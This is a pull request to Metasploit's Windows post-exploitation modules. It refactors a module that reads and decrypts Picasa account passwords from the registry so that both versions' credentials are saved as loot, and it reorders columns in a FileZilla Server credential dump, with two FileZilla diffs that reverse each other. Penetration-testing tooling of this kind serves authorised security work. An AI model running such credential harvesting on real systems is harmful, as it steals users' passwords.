### PR TITLE
Modified enum_picasa_pwds module so that Picasa 2 creds are saved as loot.

### DIFF
--- a/modules/post/windows/gather/credentials/enum_picasa_pwds.rb
+++ b/modules/post/windows/gather/credentials/enum_picasa_pwds.rb
@@ -87,7 +87,9 @@ class Metasploit3 < Msf::Post
 						"User",
 						"Password"
 					])
-
+			
+			
+			foundcreds = 0
 			if username != nil and password != nil				
 				passbin = [password].pack("H*")
 				pass = decrypt_password(passbin)
@@ -96,16 +98,9 @@ class Metasploit3 < Msf::Post
 					print_status("Found Picasa 2 credentials.")
 					print_good("Username: #{username}\t Password: #{pass}")				
 					
+					foundcreds = 1
 					credentials << [username,pass]
-					path = store_loot(
-					"picasa.creds",
-					"text/csv",
-					session,
-					credentials.to_csv,
-					"decrypted_picasa_data.csv",
-					"Decrypted Picasa Passwords")
 
-					print_status("Decrypted passwords saved in: #{path}")	
 				end
 			end
 
@@ -124,19 +119,24 @@ class Metasploit3 < Msf::Post
 					print_status("Found Picasa 3 credentials.")
 					print_good("Username: #{username}\t Password: #{pass}")					
 
-
+					foundcreds = 1
 					credentials << [username,pass]
-					path = store_loot(
-					"picasa.creds",
-					"text/csv",
-					session,
-					credentials.to_csv,
-					"decrypted_picasa_data.csv",
-					"Decrypted Picasa Passwords")
-
-					print_status("Decrypted passwords saved in: #{path}")
 				end
 			end
+		
+		if foundcreds == 1
+			path = store_loot(
+			"picasa.creds",
+			"text/csv",
+			session,
+			credentials.to_csv,
+			"decrypted_picasa_data.csv",
+			"Decrypted Picasa Passwords")
+
+			print_status("Decrypted passwords saved in: #{path}")
+		else 
+			print_status("No Picasa credentials found.")
+		end
 
 		rescue ::Exception => e
 				print_error("An error has occurred: #{e.to_s}")

--- a/modules/post/windows/gather/credentials/enum_picasa_pwds.rb
+++ b/modules/post/windows/gather/credentials/enum_picasa_pwds.rb
@@ -70,32 +70,13 @@ class Metasploit3 < Msf::Post
 	end
 
 	def get_registry
-	psecrets = ""
-
+	
 		begin
 			print_status("Looking in registry for stored login passwords by Picasa ...")
 
 			username = registry_getvaldata("HKCU\\Software\\Google\\Picasa\\Picasa2\\Preferences\\",
 			'GaiaEmail')
 			password = registry_getvaldata("HKCU\\Software\\Google\\Picasa\\Picasa2\\Preferences\\",
-			'GaiaPass')
-
-			if username != nil and password != nil
-				passbin = [password].pack("H*")
-				pass = decrypt_password(passbin)
-
-				if pass != nil
-					print_status("Username: #{username}")
-					print_status("Password: #{pass}")
-					secret = "#{username}:#{pass}"
-					psecrets << secret
-				end
-			end
-
-			#For early versions of Picasa3
-			username = registry_getvaldata("HKCU\\Software\\Google\\Picasa\\Picasa3\\Preferences\\",
-			'GaiaEmail')
-			password = registry_getvaldata("HKCU\\Software\\Google\\Picasa\\Picasa3\\Preferences\\",
 			'GaiaPass')
 
 			credentials = Rex::Ui::Text::Table.new(
@@ -107,13 +88,42 @@ class Metasploit3 < Msf::Post
 						"Password"
 					])
 
+			if username != nil and password != nil				
+				passbin = [password].pack("H*")
+				pass = decrypt_password(passbin)
+
+				if pass != nil
+					print_status("Found Picasa 2 credentials.")
+					print_good("Username: #{username}\t Password: #{pass}")				
+					
+					credentials << [username,pass]
+					path = store_loot(
+					"picasa.creds",
+					"text/csv",
+					session,
+					credentials.to_csv,
+					"decrypted_picasa_data.csv",
+					"Decrypted Picasa Passwords")
+
+					print_status("Decrypted passwords saved in: #{path}")	
+				end
+			end
+
+			#For early versions of Picasa3
+			username = registry_getvaldata("HKCU\\Software\\Google\\Picasa\\Picasa3\\Preferences\\",
+			'GaiaEmail')
+			password = registry_getvaldata("HKCU\\Software\\Google\\Picasa\\Picasa3\\Preferences\\",
+			'GaiaPass')
+
+
 			if username != nil and password != nil
 				passbin = [password].pack("H*")
 				pass = decrypt_password(passbin)
 
 				if pass != nil
-					print_status("Username: #{username}")
-					print_status("Password: #{pass}")
+					print_status("Found Picasa 3 credentials.")
+					print_good("Username: #{username}\t Password: #{pass}")					
+
 
 					credentials << [username,pass]
 					path = store_loot(

--- a/modules/post/windows/gather/credentials/filezilla_server.rb
+++ b/modules/post/windows/gather/credentials/filezilla_server.rb
@@ -89,10 +89,10 @@ class Metasploit3 < Msf::Post
 		'Indent'    => 1,
 		'Columns'   =>
 		[
-			"User",
-			"Password",
 			"Host",
 			"Port",
+			"User",
+			"Password",
 			"SSL"
 		])
 
@@ -105,14 +105,15 @@ class Metasploit3 < Msf::Post
 			"User",
 			"Dir",
 			"FileRead",
+			"FileWrite",
 			"FileDelete",
 			"FileAppend",
 			"DirCreate",
 			"DirDelete",
 			"DirList",
 			"DirSubdirs",
-			"Home",
-			"AutoCreate"
+			"AutoCreate",
+			"Home"
 		])
 
 		configuration = Rex::Ui::Text::Table.new(

--- a/modules/post/windows/gather/credentials/filezilla_server.rb
+++ b/modules/post/windows/gather/credentials/filezilla_server.rb
@@ -89,10 +89,10 @@ class Metasploit3 < Msf::Post
 		'Indent'    => 1,
 		'Columns'   =>
 		[
-			"Host",
-			"Port",
 			"User",
 			"Password",
+			"Host",
+			"Port",
 			"SSL"
 		])
 
@@ -105,15 +105,14 @@ class Metasploit3 < Msf::Post
 			"User",
 			"Dir",
 			"FileRead",
-			"FileWrite",
 			"FileDelete",
 			"FileAppend",
 			"DirCreate",
 			"DirDelete",
 			"DirList",
 			"DirSubdirs",
-			"AutoCreate",
-			"Home"
+			"Home",
+			"AutoCreate"
 		])
 
 		configuration = Rex::Ui::Text::Table.new(


### PR DESCRIPTION
Credentials were saved as loot only for Picasa 3. Picasa 2 credentials were printed, but not saved. I changed the module so that both Picasa 2 and Picasa 3 credentials are saved as loot. I also removed the unused variable "psecrets". I also now display which Picasa (2 vs 3) credentials were found for.
